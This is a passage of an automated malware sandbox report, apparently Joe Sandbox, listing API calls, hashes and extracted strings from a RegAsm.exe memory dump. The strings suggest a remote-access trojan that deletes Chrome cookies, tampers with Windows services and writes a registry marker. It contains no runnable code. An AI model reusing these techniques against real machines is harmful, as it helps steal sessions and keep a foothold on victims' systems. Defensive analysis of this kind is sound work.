                                  • Opcode ID: a4a511116df9379ae9742600550aba6f639b24d5df1c39e58585f1c9979079ab
                                  • Instruction ID: 67adef18b0c7e69bcd0bcbcd75fed6ea5b558425969ab8ef97af71e1a12f261e
                                  • Opcode Fuzzy Hash: a4a511116df9379ae9742600550aba6f639b24d5df1c39e58585f1c9979079ab
                                  • Instruction Fuzzy Hash: 9E11B135A01214BBCB24ABA6CD49DEF7FBCDF06760F10007EF905B2280DAB85E40C6A4
                                  APIs
                                    • Part of subcall function 00442E52: _free.LIBCMT ref: 00442E7B
                                  • _free.LIBCMT ref: 00443159
                                    • Part of subcall function 0043BEB5: HeapFree.KERNEL32(00000000,00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000), ref: 0043BECB
                                    • Part of subcall function 0043BEB5: GetLastError.KERNEL32(00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000,00000000), ref: 0043BEDD
                                  • _free.LIBCMT ref: 00443164
                                  • _free.LIBCMT ref: 0044316F
                                  • _free.LIBCMT ref: 004431C3
                                  • _free.LIBCMT ref: 004431CE
                                  • _free.LIBCMT ref: 004431D9
                                  • _free.LIBCMT ref: 004431E4
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 14f12bd113228a0bc42e7f884a469555986834d255118da641fb1e654957abe0
                                  • Instruction ID: a09468fba7be4ed354c4ff5dcfaf30c25cb33cc25251885fb4c19c4112b9c667
                                  • Opcode Fuzzy Hash: 14f12bd113228a0bc42e7f884a469555986834d255118da641fb1e654957abe0
                                  • Instruction Fuzzy Hash: D3116031951704A6E520FBB2CD07FCB77DCAF04B04F804C2EB39A66053DBB9A5464754
                                  APIs
                                  • GetLastError.KERNEL32(?,?,00431C7F,0042EEF4), ref: 00431C96
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00431CA4
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00431CBD
                                  • SetLastError.KERNEL32(00000000,?,00431C7F,0042EEF4), ref: 00431D0F
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLastValue___vcrt_
                                  • String ID:
                                  • API String ID: 3852720340-0
                                  • Opcode ID: 81d3ad3cf813b00a2e0cf9f8b814f9992bd51637a01967386a431731664930c9
                                  • Instruction ID: 1b5bb3bab03150c8a1469d7da8b67c39e9eff8abb396b2b9584377dc358b62c2
                                  • Opcode Fuzzy Hash: 81d3ad3cf813b00a2e0cf9f8b814f9992bd51637a01967386a431731664930c9
                                  • Instruction Fuzzy Hash: E801283230D2215EEB2557B6BC89A672B95EB4B779B20223FF610412F0FF595C02914D
                                  APIs
                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 00407F8B
                                  • GetLastError.KERNEL32 ref: 00407F95
                                  Strings
                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 00407F56
                                  • [Chrome Cookies found, cleared!], xrefs: 00407FBB
                                  • [Chrome Cookies not found], xrefs: 00407FAF
                                  • UserProfile, xrefs: 00407F5B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DeleteErrorFileLast
                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                  • API String ID: 2018770650-304995407
                                  • Opcode ID: 3f2bb7592ce8f39c0e1a84fd6a07cb408c3f06c05f5a8e02e88e211a228880d5
                                  • Instruction ID: 9b808550f0e4f9b834a21a45c6ecabfd6167029ebe00eae2a55e211491ffde40
                                  • Opcode Fuzzy Hash: 3f2bb7592ce8f39c0e1a84fd6a07cb408c3f06c05f5a8e02e88e211a228880d5
                                  • Instruction Fuzzy Hash: 0A01F231A90106AACA047B75CE1B8AE7B24A912704B50017FE902731D2FD795909C29F
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __cftoe
                                  • String ID:
                                  • API String ID: 4189289331-0
                                  • Opcode ID: c1793ce132d1af467c427d31e8c1604faa2e7e1347260eb053b15fa2b5159b61
                                  • Instruction ID: 03017b7e80f62d50ee97b9a70ef162e4b45f9fae610041ecd781f4744da9c5cc
                                  • Opcode Fuzzy Hash: c1793ce132d1af467c427d31e8c1604faa2e7e1347260eb053b15fa2b5159b61
                                  • Instruction Fuzzy Hash: 96514E72980205ABDB249B69CC42FAF77A9DF4C324F24121FF85596291DB3CDD20876E
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00412AF7,00000000), ref: 004133A8
                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00412AF7,00000000), ref: 004133BC
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00412AF7,00000000), ref: 004133C9
                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00412AF7,00000000), ref: 004133FE
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00412AF7,00000000), ref: 00413410
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00412AF7,00000000), ref: 00413413
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                  • String ID:
                                  • API String ID: 493672254-0
                                  • Opcode ID: 3071766905a9aa70e8b84d46910c906af901398d300ed7046dcbbe556962e6e3
                                  • Instruction ID: 5fec4a889dd1482bee852cd790d8d51d36b2b239aed0c5db9861f1eb3ade3fe9
                                  • Opcode Fuzzy Hash: 3071766905a9aa70e8b84d46910c906af901398d300ed7046dcbbe556962e6e3
                                  • Instruction Fuzzy Hash: FB0126315441197BD6115F295C4AEBB3A5CDB42372F00022AF925931C0CE699F4691AE
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __alldvrm$_strrchr
                                  • String ID: h^C
                                  • API String ID: 1036877536-1919427450
                                  • Opcode ID: 8971f6060f7c2517d99c660f883b476c8d3247a326061795d0278329707f7bf7
                                  • Instruction ID: fee652c8f8de97b311e1edd3a94b9fd3768e3e6ba78c6f1d0a7032b1fb29f99c
                                  • Opcode Fuzzy Hash: 8971f6060f7c2517d99c660f883b476c8d3247a326061795d0278329707f7bf7
                                  • Instruction Fuzzy Hash: 7FA14836D003869FEB11CE58C8817AFBBA5EF69314F2441BFD9959B341C23C8949C759
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040C03F
                                  • int.LIBCPMT ref: 0040C052
                                    • Part of subcall function 00409864: std::_Lockit::_Lockit.LIBCPMT ref: 00409875
                                    • Part of subcall function 00409864: std::_Lockit::~_Lockit.LIBCPMT ref: 0040988F
                                  • std::locale::_Getfacet.LIBCPMT ref: 0040C05B
                                  • std::_Facet_Register.LIBCPMT ref: 0040C092
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C09B
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C0B9
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                  • String ID:
                                  • API String ID: 2243866535-0
                                  • Opcode ID: 95aeb927a9e446bc9fb2c3204e77c5afd8f4c765209aaec4a41c12be9388a058
                                  • Instruction ID: 0b31b2499ed0c1530e6b3d0bed5a99b6867b6c6aa33ff75d33899171708bb31b
                                  • Opcode Fuzzy Hash: 95aeb927a9e446bc9fb2c3204e77c5afd8f4c765209aaec4a41c12be9388a058
                                  • Instruction Fuzzy Hash: 2A01C432900228D7CB14EFA5D88189E776C9F41714F60426FF515772D1EAB89E05C799
                                  APIs
                                  • GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                  • _free.LIBCMT ref: 0043C64B
                                  • _free.LIBCMT ref: 0043C673
                                  • SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C680
                                  • SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                  • _abort.LIBCMT ref: 0043C692
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$_free$_abort
                                  • String ID:
                                  • API String ID: 3160817290-0
                                  • Opcode ID: e8f541c665fafb93c1da0bbdfeffbbcf2c95524a8b07c2109ffe4dc02d8d7a59
                                  • Instruction ID: f51d0cfb58148002e83728663e471f6201f99694adbf6054cd0f5061c7e077da
                                  • Opcode Fuzzy Hash: e8f541c665fafb93c1da0bbdfeffbbcf2c95524a8b07c2109ffe4dc02d8d7a59
                                  • Instruction Fuzzy Hash: 1CF0497590060026C2112735BC5BF5B27559BDB769F20302FF924A2290EE2CC802425D
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00412D00,00000000), ref: 004132D9
                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00412D00,00000000), ref: 004132ED
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D00,00000000), ref: 004132FA
                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00412D00,00000000), ref: 00413309
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D00,00000000), ref: 0041331B
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D00,00000000), ref: 0041331E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ControlManager
                                  • String ID:
                                  • API String ID: 221034970-0
                                  • Opcode ID: 4418c0144d096111ae53b4e3f1717c1deceb3ca9990d3752d48c4df148a3b705
                                  • Instruction ID: b2c5ceb5835a0e52a8200594826144103f446a1ddf7c0e9e6865c673d70b3852
                                  • Opcode Fuzzy Hash: 4418c0144d096111ae53b4e3f1717c1deceb3ca9990d3752d48c4df148a3b705
                                  • Instruction Fuzzy Hash: D8F0F6759011187BD320AF659C4ADBF3B6CDB86356F40002AFE0997141DF388E4696F9
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00412C85,00000000), ref: 00413340
                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00412C85,00000000), ref: 00413354
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412C85,00000000), ref: 00413361
                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00412C85,00000000), ref: 00413370
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412C85,00000000), ref: 00413382
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412C85,00000000), ref: 00413385
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ControlManager
                                  • String ID:
                                  • API String ID: 221034970-0
                                  • Opcode ID: f13c7401ebe7a898861ac91539950dc645e57731a144732d60cdc4e431a17a9e
                                  • Instruction ID: 26a4b3f833e9e877c3d8a59b275bd20eef789fc4ef1e4340bdc2f8a59b459027
                                  • Opcode Fuzzy Hash: f13c7401ebe7a898861ac91539950dc645e57731a144732d60cdc4e431a17a9e
                                  • Instruction Fuzzy Hash: 77F0F6759411187FD3216F659C49DBF3B6CDB86396F00006AFE0997140DF388E4695F9
                                  APIs
                                  • RegisterClassExA.USER32(00000030), ref: 00415A60
                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 00415A7B
                                  • GetLastError.KERNEL32 ref: 00415A85
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ClassCreateErrorLastRegisterWindow
                                  • String ID: 0$MsgWindowClass
                                  • API String ID: 2877667751-2410386613
                                  • Opcode ID: 171986d441cc0fdba3aa014d35ecb3b22f7763cc9b94a58783fd8344a93d0701
                                  • Instruction ID: f63745ccf0cf2e059edbdb5c197b6e0c42188d60e7481a6116dcff7c28758ec6
                                  • Opcode Fuzzy Hash: 171986d441cc0fdba3aa014d35ecb3b22f7763cc9b94a58783fd8344a93d0701
                                  • Instruction Fuzzy Hash: 9A0129B5D0021DAFDB00DFD59CC49EFBBBCFA49395F40453AF814A6240E77449088BA4
                                  APIs
                                  • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0040D2B6
                                  • RegSetValueExW.ADVAPI32(?,pth_unenc,00000000,00000001,00000000,00000000,00467F30,?,?,0040A737,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040D2E6
                                  • RegCloseKey.ADVAPI32(?,?,?,0040A737,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040D2F1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCreateValue
                                  • String ID: 5.2.0 Light$pth_unenc
                                  • API String ID: 1818849710-3605515537
                                  • Opcode ID: a430c6edf17f74098992ac9154db1f546465859e2b6c872928652b55fa7155e1
                                  • Instruction ID: 2e74f0484c559c564727cfda02f69fa124803a4f800e4363bc650dd93a751580
                                  • Opcode Fuzzy Hash: a430c6edf17f74098992ac9154db1f546465859e2b6c872928652b55fa7155e1
                                  • Instruction Fuzzy Hash: 78F0F671940218BBDB009FA1ED46FEA372CEF40745F10417AFD01A7191EA355E08D654
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040974E
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040978D
                                    • Part of subcall function 0042CF7D: _Yarn.LIBCPMT ref: 0042CF9C
                                    • Part of subcall function 0042CF7D: _Yarn.LIBCPMT ref: 0042CFC0
                                  • std::bad_exception::bad_exception.LIBCMT ref: 004097A5
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004097B3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
                                  • String ID: bad locale name
                                  • API String ID: 3706160523-1405518554
                                  • Opcode ID: 13fed22de21f81b2a35b0cb37550356cb7eb9b2a9533165e17dac1c679de04f0
                                  • Instruction ID: 9d137025840e00eb06f5ff8b3a23299090e48e33d1ea126e93cf13c7e88e76db
                                  • Opcode Fuzzy Hash: 13fed22de21f81b2a35b0cb37550356cb7eb9b2a9533165e17dac1c679de04f0
                                  • Instruction Fuzzy Hash: 92F081326403146BC324FB62F952ADA73649F20314F50493FB406220D2AF78BA1DCA8A
                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004389B9,00000003,?,00438959,00000003,004619C0,0000000C,00438AB0,00000003,00000002), ref: 00438A28
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00438A3B
                                  • FreeLibrary.KERNEL32(00000000,?,?,?,004389B9,00000003,?,00438959,00000003,004619C0,0000000C,00438AB0,00000003,00000002,00000000), ref: 00438A5E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: ddf01c5aeed1f8872b046582afe7d0198474f425bac7e19766fad1f5c80fe2ec
                                  • Instruction ID: d0d7485eb252394449f42fd03d40615a4a99cb877cdef310b87857d9b9159d1f
                                  • Opcode Fuzzy Hash: ddf01c5aeed1f8872b046582afe7d0198474f425bac7e19766fad1f5c80fe2ec
                                  • Instruction Fuzzy Hash: 03F06834A01218BBDB11AF91DC49B9EBFB4EF04715F10406AFD05A2260DF745E45CB98
                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00401F3D
                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401C9F,00000001), ref: 00401F49
                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00401C9F,00000001), ref: 00401F54
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401C9F,00000001), ref: 00401F5D
                                    • Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                  • String ID: KeepAlive | Disabled
                                  • API String ID: 2993684571-305739064
                                  • Opcode ID: 0b3a1dac5053e1b5517043d79c7fa65b2ae551102c5e8ab644283b35d32d8611
                                  • Instruction ID: 4dd5d21ea278282282332d3fbbd4e75003fae811a8332383d903c8233eb77b47
                                  • Opcode Fuzzy Hash: 0b3a1dac5053e1b5517043d79c7fa65b2ae551102c5e8ab644283b35d32d8611
                                  • Instruction Fuzzy Hash: 27F0F6719047017FDB103BB59E0E96A7F98BB07715F00057FF881912E2D6B9C81097AA
                                  APIs
                                    • Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6
                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00413507
                                  • PlaySoundW.WINMM(00000000,00000000), ref: 00413515
                                  • Sleep.KERNEL32(00002710), ref: 0041351C
                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00413525
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                  • String ID: Alarm triggered
                                  • API String ID: 614609389-2816303416
                                  • Opcode ID: 9e9efe8d9f78683617940ca8831c71fd8772039a7a58f0b62664b3eb38fdf63e
                                  • Instruction ID: dd9dd7169c3b2ad8cb57031a818ea50ccae587d830f3c19570e6bdd98110ca0d
                                  • Opcode Fuzzy Hash: 9e9efe8d9f78683617940ca8831c71fd8772039a7a58f0b62664b3eb38fdf63e
                                  • Instruction Fuzzy Hash: C0E01236F44110779520376AAD0FC6F2E28DAC7B55742006FFA05571929D94081586FB
                                  APIs
                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041517C,?,?,?,00000000,771B0F10), ref: 004150EF
                                  • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041517C,?,?,?,00000000,771B0F10), ref: 004150FC
                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041517C,?,?,?,00000000,771B0F10), ref: 00415109
                                  • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041517C,?,?,?,00000000,771B0F10), ref: 0041511C
                                  Strings
                                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041510F
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                  • API String ID: 3024135584-2418719853
                                  • Opcode ID: bbb74496a4c79a37813c7393ec51be51440fa8f1a05f7dd19656b9a2878a2a6b
                                  • Instruction ID: 51ccb5ed899ab14f6f5ebcdeb72e3bd2cd834a6bdf3d7eb62036f2204a89400a
                                  • Opcode Fuzzy Hash: bbb74496a4c79a37813c7393ec51be51440fa8f1a05f7dd19656b9a2878a2a6b
                                  • Instruction Fuzzy Hash: 5FE048B694420877D6102BA5AC4FC6F7B6CE78EA13B100666FE1191193D97454054675
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b6933eeb3a564efde60f8a3cbfdfe6a07109f1c1f134dab525f5f077ad61f83e
                                  • Instruction ID: fc7f4a77169b4a8b503a3be5dc3e722b80489ba004f86df33c611c31e43807f2
                                  • Opcode Fuzzy Hash: b6933eeb3a564efde60f8a3cbfdfe6a07109f1c1f134dab525f5f077ad61f83e
                                  • Instruction Fuzzy Hash: C971C331900A169BDF21CF98C8846BFBB75FF4A350F2452ABE81167291D7748D41CFA9
                                  APIs
                                    • Part of subcall function 0043B5D9: HeapAlloc.KERNEL32(00000000,0042CBD9,?,?,0042E317,?,?,5.2.0 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B
                                  • _free.LIBCMT ref: 0043A4D4
                                  • _free.LIBCMT ref: 0043A4EB
                                  • _free.LIBCMT ref: 0043A50A
                                  • _free.LIBCMT ref: 0043A525
                                  • _free.LIBCMT ref: 0043A53C
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$AllocHeap
                                  • String ID:
                                  • API String ID: 1835388192-0
                                  • Opcode ID: 09cb3000bdfd736a432031ce544d16843c92cda7aca7540ef4c5094365ada1d5
                                  • Instruction ID: 0626f0b1727110b16f7d8c70f251855ad8de191a426444a56e789b4bc756c451
                                  • Opcode Fuzzy Hash: 09cb3000bdfd736a432031ce544d16843c92cda7aca7540ef4c5094365ada1d5
                                  • Instruction Fuzzy Hash: E751C031A40304AFDB20DF2ACC41B6A77F4EF58724F14556EE989D7260E739E9118B8A
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  • Opcode ID: a7f7c3244b323182d98a37bfe86edf306979d698ca324a6fa4207deaa86ae4c7
                                  • Instruction ID: c8c874e976f7f9d1c30b15fed1f39afc58c2ac3c026be4347813588923dff435
                                  • Opcode Fuzzy Hash: a7f7c3244b323182d98a37bfe86edf306979d698ca324a6fa4207deaa86ae4c7
                                  • Instruction Fuzzy Hash: 06410633A00210AFCB24DF78C981A5EB3E5EF88314F15416AE915EB351EB75ED01CB84
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043339C,?,00000000,?,00000001,?,?,00000001,0043339C,?), ref: 0044338A
                                  • __alloca_probe_16.LIBCMT ref: 004433C2
                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00443413
                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004326CA,?), ref: 00443425
                                  • __freea.LIBCMT ref: 0044342E
                                    • Part of subcall function 0043B5D9: HeapAlloc.KERNEL32(00000000,0042CBD9,?,?,0042E317,?,?,5.2.0 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                  • String ID:
                                  • API String ID: 1857427562-0
                                  • Opcode ID: 6eb7861f347f817c00430624536bc715ee2982cc1f153a22f7f50fc61c548a3e
                                  • Instruction ID: 613b810780fe4859688c941d2bbeff8913d35e1692fb54097f553fc103df8f50
                                  • Opcode Fuzzy Hash: 6eb7861f347f817c00430624536bc715ee2982cc1f153a22f7f50fc61c548a3e
                                  • Instruction Fuzzy Hash: 55310E72A0020AABEF259F65DC81DEF7BA5EB01B11F04016AFC14D6290EB39CE50CB94
                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32 ref: 00441543
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00441566
                                    • Part of subcall function 0043B5D9: HeapAlloc.KERNEL32(00000000,0042CBD9,?,?,0042E317,?,?,5.2.0 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044158C
                                  • _free.LIBCMT ref: 0044159F
                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004415AE
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
